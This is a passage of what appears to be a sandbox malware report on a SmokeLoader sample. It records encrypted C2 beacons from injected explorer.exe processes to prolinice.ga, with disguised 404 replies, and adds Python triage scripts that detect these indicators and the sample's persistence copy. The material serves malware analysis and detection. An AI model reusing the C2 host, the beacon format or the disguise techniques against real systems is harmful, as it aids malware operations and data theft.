                      May 28, 2024 08:24:00.120784044 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 28 May 2024 06:23:59 GMT
                      Server: Apache/2.4.59 (Debian)
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 35 32 64 38 38 0d 0a b9 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 9c 8d b7 27 5d c1 30 78 b2 34 fc 64 ca 38 5b 03 cf 4b a0 90 08 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f [TRUNCATED]
                      Data Ascii: 52d88_'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8']0x4d8[K,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/o [TRUNCATED]
                      May 28, 2024 08:24:00.120834112 CEST | 224 | IN | Data Raw: d0 7e ed e5 00 cd 59 0c 72 ff c8 4d 8a 9f 4d 22 6a 89 67 05 b3 b9 2f fa 37 ad b4 05 f0 4c 9c d2 83 fb c8 40 2b ca 87 d7 d8 99 59 38 07 be e8 b3 e1 23 2a af e7 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06
                      Data Ascii: ~YrMM"jg/7L@+Y8#*P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmB
                      May 28, 2024 08:24:00.120872021 CEST | 1236 | IN | Data Raw: 8c 13 15 48 2c 63 3a fe 6c 25 54 4d 30 85 30 92 ad 37 23 ec 06 31 91 f0 16 ff a2 b3 e1 cd 3c d6 3f 9c 79 ef 0e 00 cb f5 93 99 65 d5 2d f5 67 a5 df 07 1c 74 f5 67 bd 63 db 08 77 af d3 8c 6d 56 60 26 f6 24 45 a8 5e 97 11 75 41 b4 77 49 98 30 71 b8
                      Data Ascii: H,c:l%TM007#1<?ye-gtgcwmV`&$E^uAwI0q:<#yfHJy<4^/|gxgaD{t`viG"J+`RsqN:#(]5%f__`BxTCB/Z|-t[DDgd/pXL
                      May 28, 2024 08:24:00.120912075 CEST | 1236 | IN | Data Raw: e4 1d 37 e6 75 5c 03 96 01 ae 43 a2 02 37 3a 0c bb 2c 23 f6 16 c7 34 0b 51 a1 b0 42 47 f6 c4 67 8a ab d3 20 36 0f b2 ce 0f b0 08 1a b5 21 fe 8d 1b a2 44 ad 36 e0 77 5c 98 a2 fe 1c 8d ed 29 14 9b f8 aa 38 f5 1e c1 35 2f 97 51 4e 7c 84 77 95 ee de
                      Data Ascii: 7u\C7:,#4QBGg 6!D6w\)85/QN|wn2+w0/86Su9"M.k$qW[PNkW,RPj+\mT~/^\U&gB,5<z#{4s/X/5e?s$lQ7]F
                      May 28, 2024 08:24:00.120946884 CEST | 1236 | IN | Data Raw: 76 42 63 9d f6 9b 07 14 29 a7 e1 78 c2 42 36 6a 58 0a 60 23 51 bf 62 27 01 e7 c5 7d 19 05 9d be 9b b5 07 54 be 5e 5e 62 6e ad 7d 76 06 9c a3 e1 b9 8d ef cd 66 61 75 c8 9e 29 8d 8f 4e 72 29 15 bc f2 3c 68 2f 82 44 67 71 60 3f 94 9d 7c 6c 44 9a d5
                      Data Ascii: vBc)xB6jX`#Qb'}T^^bn}vfau)Nr)<h/Dgq`?|lD~c^%u=6N!\}K14KH;z<d#C^n+~UdH+J8SSo_g+>yS^5%#B>ef)wO/jHP:+ -
                      May 28, 2024 08:24:00.120981932 CEST | 1236 | IN | Data Raw: 2d 53 82 bd 66 00 6a 4f 59 66 f7 4f 3f 64 a0 0b 80 c4 24 55 57 f4 3d fb 23 d0 de c5 4b 19 0a 54 5a fe ff c3 bd 04 8f 42 07 68 c9 d2 dc e0 02 14 01 a2 56 a5 31 58 c7 29 8b b7 d1 6a 47 a4 44 d4 5f 87 43 d9 f3 f9 12 9f da 66 d2 14 69 65 fe 9f 52 b4
                      Data Ascii: -SfjOYfO?d$UW=#KTZBhV1X)jGD_CfieRHncQl'$u;qdB4]*^%oAwKlos\if[y-ea(78i4v>ZGNj-L.EQO h/8gHmxPPc!}P04 .
                      May 28, 2024 08:24:00.121014118 CEST | 896 | IN | Data Raw: 75 0d d7 f2 13 5b 04 97 57 f5 04 0d 66 a1 c5 ab f7 48 4d d3 dc 47 fa 12 e4 8d b8 3e 8d ea 47 ab a3 bd 57 3d 95 5d bb bf 25 df f0 35 85 82 41 16 0e 6a 17 5a 41 bc 5d 5b 61 fc 7a 2c e0 3a 53 9b 00 2f 8d d7 71 2b 0e de e5 aa 0f 00 49 07 5a 45 0f 1e
                      Data Ascii: u[WfHMG>GW=]%5AjZA][az,:S/q+IZE,I`J|fj9A+h[kZ.N'/PqsN^gt9@TMz%wwlN%]V sL9`eoEQ,,KPLzTl
                      May 28, 2024 08:24:00.121057987 CEST | 1236 | IN | Data Raw: 16 30 02 45 55 5a 28 71 df 03 a9 d5 a3 6e 6d 54 81 f9 01 96 b0 09 28 a6 03 2e d0 c3 6d 13 d9 81 41 46 15 0b ba f9 b3 7e 65 76 92 5d cc 1e ae a9 35 b4 41 50 5c 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f
                      Data Ascii: 0EUZ(qnmT(.mAF~ev]5AP\z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[
                      May 28, 2024 08:24:00.121088028 CEST | 224 | IN | Data Raw: 3e d4 f9 b3 b7 95 fc d2 44 f5 2d db 0a e5 e9 86 70 da e1 4f 6b 80 17 d7 ab d4 a0 08 24 67 24 e3 fe c2 c7 f6 91 d7 cc 2d 16 83 7e af 9b 2b 47 23 a5 d8 d3 76 93 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a
                      Data Ascii: >D-pOk$g$-~+G#v}b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n*_vUL*WvNzY&k:_@qfh)[\
                      May 28, 2024 08:24:00.121438980 CEST | 1236 | IN | Data Raw: fd 05 4c 9d ba f2 ec 4d 6a f5 8d 8a ae 38 4c be b2 c6 8a e5 63 79 a3 8c 19 79 3a 5f 77 90 9c 7c 94 e4 f9 4f 7c 3a ba 38 a1 7f 33 47 55 9b 2e 52 17 3d ce b6 e7 90 7d 0f 3a 11 da 07 18 69 c9 f9 71 a7 39 b5 5b 4e dc c5 8a f3 54 7d 5d 3b d2 b1 96 9f
                      Data Ascii: LMj8Lcyy:_w|O|:83GU.R=}:iq9[NT}];XuaJ6[?'ZGPIOpo9oQDoOVFhuu<gB#qx)z#j-d$hUe4U4GX (7@2$.


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.4 | 49737 | 77.232.129.190 | 80 | 7616 | C:\Windows\SysWOW64\explorer.exe
                      Timestamp | Bytes transferred | Direction | Data
                      May 28, 2024 08:24:02.212639093 CEST | 275 | OUT | POST /index.php HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://prolinice.ga/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 4431
                      Host: prolinice.ga
                      May 28, 2024 08:24:02.212672949 CEST | 4431 | OUT | Data Raw: 6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 70 a4 c2 a2
                      Data Ascii: nJaneL_QPGODp2geug]H8.6hEvRY;PLpOc~k_!z1rJC\S7W/x*>x :xGresn*q~DD%vx^2~mt-GD#SO`tAEi*y}`8
                      May 28, 2024 08:24:03.177079916 CEST | 584 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 28 May 2024 06:24:02 GMT
                      Server: Apache/2.4.59 (Debian)
                      Content-Length: 409
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.4 | 49746 | 77.232.129.190 | 80 | 2580 | C:\Windows\explorer.exe
                      Timestamp | Bytes transferred | Direction | Data
                      May 28, 2024 08:25:17.382160902 CEST | 277 | OUT | POST /index.php HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://klhdddxmavj.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 109
                      Host: prolinice.ga
                      May 28, 2024 08:25:17.382191896 CEST | 109 | OUT | Data Raw: 6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
                      Data Ascii: nJaneL_QPGODp2g &7H8.6hEv:RX;PLgjngaiF#Q 9
                      May 28, 2024 08:25:18.345221043 CEST | 343 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 28 May 2024 06:25:18 GMT
                      Server: Apache/2.4.59 (Debian)
                      Content-Length: 168
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: a4 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3
                      Data Ascii: _'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.4 | 49747 | 77.232.129.190 | 80 | 2580 | C:\Windows\explorer.exe
                      Timestamp | Bytes transferred | Direction | Data
                      May 28, 2024 08:25:18.651241064 CEST | 278 | OUT | POST /index.php HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://angnktfflahc.com/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 109
                      Host: prolinice.ga
                      May 28, 2024 08:25:18.651268005 CEST | 109 | OUT | Data Raw: 6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
                      Data Ascii: nJaneL_QPGODp2g &7H8.6hEv:RX;PLgjngaiF#Q 9
                      May 28, 2024 08:25:19.604626894 CEST | 343 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 28 May 2024 06:25:19 GMT
                      Server: Apache/2.4.59 (Debian)
                      Content-Length: 168
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: a4 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3
                      Data Ascii: _'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.4 | 49748 | 77.232.129.190 | 80 | 2580 | C:\Windows\explorer.exe
                      Timestamp | Bytes transferred | Direction | Data
                      May 28, 2024 08:25:40.383744001 CEST | 281 | OUT | POST /index.php HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://wcxnjsqwwfpkqnc.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 109
                      Host: prolinice.ga
                      May 28, 2024 08:25:40.383760929 CEST | 109 | OUT | Data Raw: 6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
                      Data Ascii: nJaneL_QPGODp2g &7H8.6hEv:RX;PLgjngaiF#Q 9
                      May 28, 2024 08:25:41.411209106 CEST | 343 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 28 May 2024 06:25:41 GMT
                      Server: Apache/2.4.59 (Debian)
                      Content-Length: 168
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: a4 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3
                      Data Ascii: _'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8

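The five HTTP sessions above share one shape: a POST to /index.php sent from explorer.exe, a form-urlencoded Content-Type over an opaque binary body, a Referer naming a domain other than the Host header (ucwdyepiwprre.org, klhdddxmavj.net, angnktfflahc.com, wcxnjsqwwfpkqnc.net against Host: prolinice.ga), and a "404 Not Found" reply whose body is either a genuine Apache error page (Session 1) or, on the first beacon, a chunked binary blob whose first chunk is 0x52d88 bytes (339,336, about 331 KiB, far more than an error page needs). The first 43 bytes of every POST body in the report are identical. The script below is an added example, not part of the Joe Sandbox report or of the sample: it turns those observations into triage checks and runs them over request/response pairs constructed from Session 0 and Session 1. Headers are copied from the report (Date omitted); the bodies are the leading bytes of each "Data Raw" line, embedded as constructed stand-ins for the truncated data, so Content-Length is recomputed to fit. Indicator names and the thresholds (90 % printable, 64 KiB chunk) are this example's own choices.

```python
"""Triage checks for the HTTP exchanges recorded in the sessions above.

Added example, not part of the Joe Sandbox report. Headers are copied
from Session 0 and Session 1 (Date omitted); bodies are the leading
bytes of each 'Data Raw' line, embedded as constructed stand-ins for
the truncated data, so Content-Length is recomputed to fit. Indicator
names and thresholds are this example's own.
"""
from urllib.parse import urlsplit

# Every POST body in the report begins with these same 43 bytes.
SEEN_PREFIX = bytes.fromhex(
    "6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea"
    " ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4"
)
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def http_message(start_line: str, headers: dict, body: bytes) -> bytes:
    """Serialise one HTTP/1.1 message; Content-Length tracks the embedded body."""
    hdrs = dict(headers)
    if "Transfer-Encoding" not in hdrs:
        hdrs["Content-Length"] = str(len(body))
    head = start_line + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in hdrs.items()) + "\r\n"
    return head.encode("latin-1") + body


POST_HEADERS = {"Connection": "Keep-Alive", "Content-Type": "application/x-www-form-urlencoded",
                "Accept": "*/*", "User-Agent": UA, "Host": "prolinice.ga"}
# Session 0: explorer.exe (PID 2580); Referer names a domain other than Host.
REQ0 = http_message("POST /index.php HTTP/1.1", {**POST_HEADERS, "Referer": "http://ucwdyepiwprre.org/"},
    SEEN_PREFIX + bytes.fromhex("fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76"
                                " e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 0c de 9f a3"))
# Its '404' is chunked with a first chunk of 0x52d88 bytes, and the data is not HTML.
RESP0 = http_message("HTTP/1.1 404 Not Found", {"Server": "Apache/2.4.59 (Debian)", "Connection": "close",
    "Transfer-Encoding": "chunked", "Content-Type": "text/html; charset=utf-8"},
    b"52d88\r\n" + bytes.fromhex("b9 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b"))
# Session 1: SysWOW64\explorer.exe (PID 7616); same body prefix, Referer equal to Host,
# and a genuine Apache 404 page in reply.
REQ1 = http_message("POST /index.php HTTP/1.1", {**POST_HEADERS, "Referer": "http://prolinice.ga/"},
    SEEN_PREFIX + bytes.fromhex("b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76"))
RESP1 = http_message("HTTP/1.1 404 Not Found", {"Server": "Apache/2.4.59 (Debian)", "Connection": "close",
    "Content-Type": "text/html; charset=utf-8"},
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\r\n<html><head>\r\n'
    b"<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n</body></html>")


def parse_http(raw: bytes):
    """Split a raw message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body


def printable_ratio(data: bytes) -> float:
    return sum(b in PRINTABLE for b in data) / len(data) if data else 1.0


def triage(raw_request: bytes, raw_response: bytes) -> list:
    """Return the indicator names that fire for one request/response pair."""
    _, req_h, req_body = parse_http(raw_request)
    status_line, resp_h, resp_body = parse_http(raw_response)
    hits = []
    referer_host = urlsplit(req_h.get("referer", "")).hostname or ""
    if referer_host and referer_host != req_h.get("host", "").lower():
        hits.append("referer-host-mismatch")
    # A form-urlencoded body should be almost entirely printable ASCII.
    if "x-www-form-urlencoded" in req_h.get("content-type", "") and printable_ratio(req_body) < 0.9:
        hits.append("binary-form-body")
    if req_body.startswith(SEEN_PREFIX):
        hits.append("known-post-prefix")
    if status_line.split(" ")[1] == "404":
        payload = resp_body
        if resp_h.get("transfer-encoding", "").lower() == "chunked":
            size_line, _, payload = resp_body.partition(b"\r\n")
            chunk = int(size_line.split(b";")[0].decode("latin-1"), 16)
            if chunk > 64 * 1024:  # an error page does not need a third of a megabyte
                hits.append(f"oversized-404-chunk:{chunk}")
        if not payload.lstrip().startswith(b"<"):
            hits.append("non-html-404-body")
    return hits


if __name__ == "__main__":
    print("session 0:", triage(REQ0, RESP0))
    print("session 1:", triage(REQ1, RESP1))
```

Session 0 trips every check; Session 1, whose Referer matches the Host and whose reply is a real error page, still trips the body checks, which is the point: the constant prefix and the non-printable "form" body survive even when the server answers with a plain 404. The 43-byte prefix is a pattern seen across the beacons in this one report, not a general SmokeLoader signature; treat it as a per-sample indicator.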

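The process entries that follow show the host-side counterpart of that traffic: the submitted sample (MD5 9C0DE297B9EA30FFBE100EE12150F122) reappears as the extension-less file C:\Users\user\AppData\Roaming\rrrrcve; several 32-bit C:\Windows\SysWOW64\explorer.exe instances run on a 64-bit host next to extra C:\Windows\explorer.exe instances beyond the desktop shell; and the SmokeLoader Yara rules match a memory dump (.sdmp) of one of those SysWOW64 explorer.exe processes rather than a file on disk. The script below is an added example, not part of the Joe Sandbox report: it parses the report's "key:value" entry format and applies those checks. REPORT_TEXT is a trimmed copy of the entries for Targets 1, 5, 7 and 11, embedded as constructed input so it runs offline; the rule names are this example's own, and the "shell is the lowest-numbered explorer.exe" assumption rests on the report numbering targets in start order.

```python
"""Parse the per-process entries of this report and flag the host-side
SmokeLoader indicators they carry.

Added example, not part of the Joe Sandbox report. REPORT_TEXT is a
trimmed copy of the report's own entries for Targets 1, 5, 7 and 11,
embedded as constructed input so the script runs offline; the rule
names are this example's own.
"""
import re

SAMPLE_MD5 = "9C0DE297B9EA30FFBE100EE12150F122"  # MD5 of the submitted sample

REPORT_TEXT = r"""
Target ID:1
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has exited:false

Target ID:5
Path:C:\Users\user\AppData\Roaming\rrrrcve
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\rrrrcve
MD5 hash:9C0DE297B9EA30FFBE100EE12150F122
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\rrrrcve, Author: Joe Security
Has exited:true

Target ID:7
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe
MD5 hash:662F4F92FDE3557E86D110526BB578D5
Has exited:true

Target ID:11
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
Yara matches:
• Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:false
"""


def parse_targets(text: str) -> list:
    """Split the blank-line-separated 'key:value' blocks into dicts.
    Bullet lines (Yara / antivirus matches) are collected under 'bullets'."""
    targets = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {"bullets": []}
        for line in block.splitlines():
            line = line.strip()
            if line.startswith("•"):
                rec["bullets"].append(line.lstrip("• "))
            elif line:
                key, _, value = line.partition(":")
                rec[key.strip()] = value.strip()
        targets.append(rec)
    return targets


def flag(targets: list, sample_md5: str) -> dict:
    """Return {Target ID: [indicator, ...]} for every parsed process."""
    explorer = [t for t in targets if t["Path"].lower() == r"c:\windows\explorer.exe"]
    # Targets are numbered in start order, so the lowest-numbered explorer.exe
    # is the desktop shell; every later one is an extra instance.
    shell = min(explorer, key=lambda t: int(t["Target ID"]), default=None)
    findings = {}
    for t in targets:
        path, lower, hits = t["Path"], t["Path"].lower(), []
        if t.get("MD5 hash", "").upper() == sample_md5.upper() and "\\appdata\\" in lower:
            hits.append("sample-copied-to-appdata")
        if "." not in path.rsplit("\\", 1)[-1]:
            hits.append("extensionless-image")
        if lower == r"c:\windows\syswow64\explorer.exe":
            hits.append("32bit-explorer-on-64bit-host")
        if lower == r"c:\windows\explorer.exe" and t is not shell:
            hits.append("extra-explorer-instance")
        if lower.startswith("c:\\windows\\") and any(".sdmp" in b for b in t["bullets"]):
            hits.append("yara-hit-in-system-process-memory")
        findings[t["Target ID"]] = hits
    return findings


if __name__ == "__main__":
    for tid, hits in flag(parse_targets(REPORT_TEXT), SAMPLE_MD5).items():
        print(f"Target {tid}: {', '.join(hits) or 'no indicators'}")
```

Target 1 (the shell) comes out clean; Target 5 is the persistence copy; Target 7 is an explorer.exe the shell did not need; Target 11 is a 32-bit explorer.exe whose memory, not its image, matches the SmokeLoader rules, which is what code injection looks like in a sandbox listing. The same rules map directly onto EDR process-creation and memory-scan telemetry, with the MD5 check replaced by whichever hash the telemetry records.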
                      Target ID:0
                      Start time:02:23:34
                      Start date:28/05/2024
                      Path:C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe"
                      Imagebase:0x400000
                      File size:37'888 bytes
